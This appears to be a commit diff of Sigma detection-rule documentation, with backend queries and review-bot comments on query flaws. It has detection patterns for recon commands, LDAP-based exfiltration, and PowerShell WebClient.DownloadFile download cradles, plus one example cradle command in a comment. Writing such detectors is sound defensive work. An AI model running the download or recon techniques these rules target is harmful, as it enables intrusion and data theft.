"email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Schtasks Creations\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b0d77106-7bb0-41fe-bd94-d1752164d066 <<EOF\n{\n "metadata": {\n "title": "Rare Schtasks Creations",\n "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code",\n "tags": [\n "attack.execution",\n "attack.privilege_escalation",\n "attack.persistence",\n "attack.t1053",\n "car.2013-08-001"\n ],\n "query": "EventID:\\"4698\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"4698\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "TaskName",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Schtasks Creations\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
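Review bot: the trigger fires every `7d` (`"schedule": {"interval": "7d"}`) but the input only searches `"timestamp": {"gte": "now-30m/m"}`, so each run inspects 30 minutes out of every week and the "rare task creation" count is computed on a near-empty window; either widen the range to match the interval (`now-7d/d`) or shorten the interval to match the window. The `TaskName.keyword` to `TaskName` change in the aggregation carries the same keyword-mapping requirement as the other watches in this commit.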

View File

@ -57,7 +57,7 @@ level: low
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/66bfef30-22a5-4fcd-ad44-8d81e60922ae <<EOF\n{\n "metadata": {\n "title": "Rare Service Installs",\n "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services",\n "tags": [\n "attack.persistence",\n "attack.privilege_escalation",\n "attack.t1050",\n "car.2013-09-005"\n ],\n "query": "EventID:\\"7045\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"7045\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "ServiceFileName.keyword",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Service Installs\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/66bfef30-22a5-4fcd-ad44-8d81e60922ae <<EOF\n{\n "metadata": {\n "title": "Rare Service Installs",\n "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services",\n "tags": [\n "attack.persistence",\n "attack.privilege_escalation",\n "attack.t1050",\n "car.2013-09-005"\n ],\n "query": "EventID:\\"7045\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"7045\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "ServiceFileName",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Service Installs\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
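Review bot: ordering a terms aggregation by `"order": {"_count": "asc"}` and then testing `buckets.0.doc_count` with `lt 5` is unreliable: Elasticsearch builds the top-N buckets per shard and merges them, so the globally rarest `ServiceFileName` values can be absent from the response and the condition is evaluated on a bucket that is not actually the rarest. A `rare_terms` aggregation with `max_doc_count: 4` (Elasticsearch 7.3+) expresses "fewer than 5 installs" directly; on older clusters a `bucket_selector` pipeline over a larger `size` is the safer fallback. The `ServiceFileName.keyword` to `ServiceFileName` switch also needs that field mapped as `keyword`.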

View File

@ -78,7 +78,7 @@ level: medium
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/2887e914-ce96-435f-8105-593937e90757 <<EOF\n{\n "metadata": {\n "title": "Reconnaissance Activity with Net Command",\n "description": "Detects a set of commands often used in recon stages by different attack groups",\n "tags": [\n "attack.discovery",\n "attack.t1087",\n "attack.t1082",\n "car.2016-03-001"\n ],\n "query": "CommandLine.keyword:(tasklist OR net\\\\ time OR systeminfo OR whoami OR nbtstat OR net\\\\ start OR *\\\\\\\\net1\\\\ start OR qprocess OR nslookup OR hostname.exe OR *\\\\\\\\net1\\\\ user\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"domain\\\\ admins\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"Exchange\\\\ Trusted\\\\ Subsystem\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ accounts\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ user\\\\ net\\\\ localgroup\\\\ administrators OR netstat\\\\ \\\\-an)"\n },\n "trigger": {\n "schedule": {\n "interval": "15s"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine.keyword:(tasklist OR net\\\\ time OR systeminfo OR whoami OR nbtstat OR net\\\\ start OR *\\\\\\\\net1\\\\ start OR qprocess OR nslookup OR hostname.exe OR *\\\\\\\\net1\\\\ user\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"domain\\\\ admins\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"Exchange\\\\ Trusted\\\\ Subsystem\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ accounts\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ user\\\\ net\\\\ localgroup\\\\ administrators OR netstat\\\\ \\\\-an)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "CommandLine.keyword",\n "size": 10,\n "order": {\n "_count": "desc"\n 
},\n "min_doc_count": 5\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "gt": 4\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Reconnaissance Activity with Net Command\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/2887e914-ce96-435f-8105-593937e90757 <<EOF\n{\n "metadata": {\n "title": "Reconnaissance Activity with Net Command",\n "description": "Detects a set of commands often used in recon stages by different attack groups",\n "tags": [\n "attack.discovery",\n "attack.t1087",\n "attack.t1082",\n "car.2016-03-001"\n ],\n "query": "CommandLine.keyword:(tasklist OR net\\\\ time OR systeminfo OR whoami OR nbtstat OR net\\\\ start OR *\\\\\\\\net1\\\\ start OR qprocess OR nslookup OR hostname.exe OR *\\\\\\\\net1\\\\ user\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"domain\\\\ admins\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"Exchange\\\\ Trusted\\\\ Subsystem\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ accounts\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ user\\\\ net\\\\ localgroup\\\\ administrators OR netstat\\\\ \\\\-an)"\n },\n "trigger": {\n "schedule": {\n "interval": "15s"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine.keyword:(tasklist OR net\\\\ time OR systeminfo OR whoami OR nbtstat OR net\\\\ start OR *\\\\\\\\net1\\\\ start OR qprocess OR nslookup OR hostname.exe OR *\\\\\\\\net1\\\\ user\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"domain\\\\ admins\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"Exchange\\\\ Trusted\\\\ Subsystem\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ accounts\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ user\\\\ net\\\\ localgroup\\\\ administrators OR netstat\\\\ \\\\-an)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "CommandLine",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n 
"min_doc_count": 5\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "gt": 4\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Reconnaissance Activity with Net Command\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
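Review bot: query and aggregation now disagree on the field: the `query_string` still matches on `CommandLine.keyword:(tasklist OR ...)` while the `terms` aggregation was changed to `"field": "CommandLine"`. If `CommandLine` is a `text` field the aggregation fails; if it is a `keyword` field the `.keyword` subfield in the query most likely does not exist and the query matches nothing. Use one field name in both places. Also visible in the same lines: the watch polls every `15s` over a `now-30m/m` window with `"gt": 4` on the top bucket, so one recon burst is re-reported roughly 120 times before it ages out.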

View File

@ -36,6 +36,7 @@ logsource:
detection:
selection:
EventID: 1033
Source: Microsoft-Windows-DHCP-Server
condition: selection
falsepositives:
- Unknown
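Review bot: `Source: Microsoft-Windows-DHCP-Server` narrows EventID 1033 to the right provider, but `Source` is not a field the Sigma generic Windows mapping normalises, so every backend passes it through literally and matching depends on the collector actually naming the provider `Source` (Winlogbeat, for instance, exposes it as `source_name` or `winlog.provider_name`). Either add a field mapping to the backend configs or make the rule's `logsource` select the DHCP server channel so the provider constraint is expressed where it belongs.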
@ -50,42 +51,42 @@ level: critical
### es-qs
```
EventID:"1033"
(EventID:"1033" AND Source:"Microsoft\\-Windows\\-DHCP\\-Server")
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/13fc89a9-971e-4ca6-b9dc-aa53a445bf40 <<EOF\n{\n "metadata": {\n "title": "DHCP Server Loaded the CallOut DLL",\n "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded",\n "tags": [\n "attack.defense_evasion",\n "attack.t1073"\n ],\n "query": "EventID:\\"1033\\""\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"1033\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'DHCP Server Loaded the CallOut DLL\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/13fc89a9-971e-4ca6-b9dc-aa53a445bf40 <<EOF\n{\n "metadata": {\n "title": "DHCP Server Loaded the CallOut DLL",\n "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded",\n "tags": [\n "attack.defense_evasion",\n "attack.t1073"\n ],\n "query": "(EventID:\\"1033\\" AND Source:\\"Microsoft\\\\-Windows\\\\-DHCP\\\\-Server\\")"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"1033\\" AND Source:\\"Microsoft\\\\-Windows\\\\-DHCP\\\\-Server\\")",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'DHCP Server Loaded the CallOut DLL\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
EventID:"1033"
(EventID:"1033" AND Source:"Microsoft\\-Windows\\-DHCP\\-Server")
```
### splunk
```
EventID="1033"
(EventID="1033" Source="Microsoft-Windows-DHCP-Server")
```
### logpoint
```
(event_source="Microsoft-Windows-Security-Auditing" event_id="1033")
(event_source="Microsoft-Windows-Security-Auditing" event_id="1033" Source="Microsoft-Windows-DHCP-Server")
```
### grep
```
grep -P '^1033'
grep -P '^(?:.*(?=.*1033)(?=.*Microsoft-Windows-DHCP-Server))'
```
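Review bot: the regenerated logpoint query (`event_source="Microsoft-Windows-Security-Auditing" event_id="1033" Source="Microsoft-Windows-DHCP-Server"`) can never match: the `event_source` constant comes from the security-channel mapping and contradicts the DHCP provider the selection now requires, so this backend silently loses the rule; the logsource should resolve to the DHCP server log, not the security log. The grep line works but its two lookaheads are unordered and `1033` also matches inside any longer number; anchoring it as a whole token (`\b1033\b`) would avoid that.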

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,97 @@
| Title | Suspicious LDAP-Attributes Used |
|:-------------------------|:------------------|
| **Description** | detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies. |
| **ATT&amp;CK Tactic** | <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1041: Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041)</li></ul> |
| **Data Needed** | <ul><li>[DN_0026_5136_windows_directory_service_object_was_modified](../Data_Needed/DN_0026_5136_windows_directory_service_object_was_modified.md)</li></ul> |
| **Trigger** | <ul><li>[T1041: Exfiltration Over Command and Control Channel](../Triggers/T1041.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>Companies, who may use these default LDAP-Attributes for personal information</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961](https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961)</li><li>[https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/](https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/)</li><li>[https://github.com/fox-it/LDAPFragger](https://github.com/fox-it/LDAPFragger)</li></ul> |
| **Author** | xknow @xknow_infosec |
## Detection Rules
### Sigma rule
```
title: Suspicious LDAP-Attributes Used
id: d00a9a72-2c09-4459-ad03-5e0a23351e36
description: detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.
status: experimental
date: 2019/03/24
author: xknow @xknow_infosec
references:
- https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961
- https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/
- https://github.com/fox-it/LDAPFragger
tags:
- attack.t1041
- attack.persistence
logsource:
product: windows
service: security
detection:
selection:
EventID: 5136
AttributeValue: '*'
AttributeLDAPDisplayName:
- 'primaryInternationalISDNNumber'
- 'otherFacsimileTelephoneNumber'
- 'primaryTelexNumber'
condition: selection
falsepositives:
- Companies, who may use these default LDAP-Attributes for personal information
level: high
```
### es-qs
```
(EventID:"5136" AND AttributeValue.keyword:* AND AttributeLDAPDisplayName:("primaryInternationalISDNNumber" OR "otherFacsimileTelephoneNumber" OR "primaryTelexNumber"))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/d00a9a72-2c09-4459-ad03-5e0a23351e36 <<EOF\n{\n "metadata": {\n "title": "Suspicious LDAP-Attributes Used",\n "description": "detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.",\n "tags": [\n "attack.t1041",\n "attack.persistence"\n ],\n "query": "(EventID:\\"5136\\" AND AttributeValue.keyword:* AND AttributeLDAPDisplayName:(\\"primaryInternationalISDNNumber\\" OR \\"otherFacsimileTelephoneNumber\\" OR \\"primaryTelexNumber\\"))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"5136\\" AND AttributeValue.keyword:* AND AttributeLDAPDisplayName:(\\"primaryInternationalISDNNumber\\" OR \\"otherFacsimileTelephoneNumber\\" OR \\"primaryTelexNumber\\"))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious LDAP-Attributes Used\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(EventID:"5136" AND AttributeValue.keyword:* AND AttributeLDAPDisplayName:("primaryInternationalISDNNumber" "otherFacsimileTelephoneNumber" "primaryTelexNumber"))
```
### splunk
```
(EventID="5136" AttributeValue="*" (AttributeLDAPDisplayName="primaryInternationalISDNNumber" OR AttributeLDAPDisplayName="otherFacsimileTelephoneNumber" OR AttributeLDAPDisplayName="primaryTelexNumber"))
```
### logpoint
```
(event_source="Microsoft-Windows-Security-Auditing" event_id="5136" AttributeValue="*" AttributeLDAPDisplayName IN ["primaryInternationalISDNNumber", "otherFacsimileTelephoneNumber", "primaryTelexNumber"])
```
### grep
```
grep -P '^(?:.*(?=.*5136)(?=.*.*)(?=.*(?:.*primaryInternationalISDNNumber|.*otherFacsimileTelephoneNumber|.*primaryTelexNumber)))'
```
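Review bot: tactic and technique do not agree: T1041 (Exfiltration Over Command and Control Channel) belongs to the Exfiltration tactic, but the rule is tagged `attack.persistence`, which is why the rendered table lists TA0003 Persistence next to T1041; tag it `attack.exfiltration` (or choose a command-and-control technique if the point is the LDAP channel itself) so the ATT&CK rows are consistent. `date: 2019/03/24` also predates both blog references from March 2020, so `2020/03/24` looks intended. `AttributeValue: '*'` correctly asserts a non-empty value, but note the grep backend reduces it to the no-op lookahead `(?=.*.*)`, so that backend effectively ignores the condition.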

View File

@ -21,8 +21,8 @@ title: MSHTA Suspicious Execution 01
id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3
status: experimental
description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
date: 22/02/2019
modified: 22/02/2019
date: 2019/02/22
modified: 2019/02/22
author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
references:
- http://blog.sevagas.com/?Hacking-around-HTA-files

View File

@ -0,0 +1,93 @@
| Title | PowerShell DownloadFile |
|:-------------------------|:------------------|
| **Description** | Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line |
| **ATT&amp;CK Tactic** | <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul> |
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | <ul><li>[T1086: PowerShell](../Triggers/T1086.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>Unknown</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html)</li></ul> |
| **Author** | Florian Roth |
## Detection Rules
### Sigma rule
```
title: PowerShell DownloadFile
id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5
status: experimental
description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
references:
- https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
author: Florian Roth
date: 2020/03/25
tags:
- attack.execution
- attack.t1086
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'powershell'
- '.DownloadFile'
- 'System.Net.WebClient'
condition: selection
falsepositives:
- Unknown
level: high
```
### es-qs
```
(CommandLine.keyword:*powershell* AND CommandLine.keyword:*.DownloadFile* AND CommandLine.keyword:*System.Net.WebClient*)
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8f70ac5f-1f6f-4f8e-b454-db19561216c5 <<EOF\n{\n "metadata": {\n "title": "PowerShell DownloadFile",\n "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line",\n "tags": [\n "attack.execution",\n "attack.t1086"\n ],\n "query": "(CommandLine.keyword:*powershell* AND CommandLine.keyword:*.DownloadFile* AND CommandLine.keyword:*System.Net.WebClient*)"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(CommandLine.keyword:*powershell* AND CommandLine.keyword:*.DownloadFile* AND CommandLine.keyword:*System.Net.WebClient*)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'PowerShell DownloadFile\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(CommandLine.keyword:*powershell* AND CommandLine.keyword:*.DownloadFile* AND CommandLine.keyword:*System.Net.WebClient*)
```
### splunk
```
(CommandLine="*powershell*" CommandLine="*.DownloadFile*" CommandLine="*System.Net.WebClient*")
```
### logpoint
```
(event_id="1" CommandLine="*powershell*" CommandLine="*.DownloadFile*" CommandLine="*System.Net.WebClient*")
```
### grep
```
grep -P '^(?:.*(?=.*.*powershell.*)(?=.*.*\\.DownloadFile.*)(?=.*.*System\\.Net\\.WebClient.*))'
```
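Review bot: requiring the literal `System.Net.WebClient` misses the most common shorthand, `New-Object Net.WebClient` (PowerShell resolves the `System.` prefix automatically), so `powershell -nop -c "(New-Object Net.WebClient).DownloadFile(...)"` does not fire; `'Net.WebClient'` as the contains term covers both spellings. The generated es-qs and graylog queries run wildcards on `CommandLine.keyword`, which is case-sensitive unless the index has a lowercase normalizer, so `PowerShell.exe` or `.downloadfile(` slip through there while Splunk's value matching is case-insensitive by default; this backend-dependent behaviour deserves a line in the rule. Finally, the logpoint output is pinned to `event_id="1"` (Sysmon) although Data Needed also lists 4688.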

View File

@ -3,7 +3,7 @@
| **Description** | Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities |
| **ATT&amp;CK Tactic** | <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)</li></ul> |
| **Data Needed** | <ul><li>[DN_0038_1102_the_audit_log_was_cleared](../Data_Needed/DN_0038_1102_the_audit_log_was_cleared.md)</li><li>[DN_0050_1102_audit_log_was_cleared](../Data_Needed/DN_0050_1102_audit_log_was_cleared.md)</li></ul> |
| **Data Needed** | <ul><li>[DN_0050_1102_audit_log_was_cleared](../Data_Needed/DN_0050_1102_audit_log_was_cleared.md)</li></ul> |
| **Trigger** | <ul><li>[T1070: Indicator Removal on Host](../Triggers/T1070.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)</li><li>System provisioning (system reset before the golden image creation)</li></ul> |

View File

@ -24,7 +24,7 @@ description: It is extremely abnormal for svchost.exe to spawn without any CLI a
references:
- https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2
author: David Burkett
date: 12/28/2019
date: 2019/12/28
tags:
- attack.t1055
logsource:

View File

@ -6,7 +6,7 @@
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | There is no documented Trigger for this Detection Rule yet |
| **Severity Level** | high |
| **False Positives** | <ul><li>U</li><li>n</li><li>k</li><li>n</li><li>o</li><li>w</li><li>n</li></ul> |
| **False Positives** | <ul><li>Unknown</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon](https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon)</li></ul> |
| **Author** | Kirill Kiryanov, oscd.community |
@ -36,7 +36,8 @@ detection:
- 'unload'
- 'sys'
condition: selection
falsepositives: Unknown
falsepositives:
- Unknown
level: high
fields:
- CommandLine

View File

@ -48,10 +48,11 @@ detection:
- '*\lsm.exe'
- '*\winlogon.exe'
- '*\explorer.exe'
- '*\taskhost.exe'
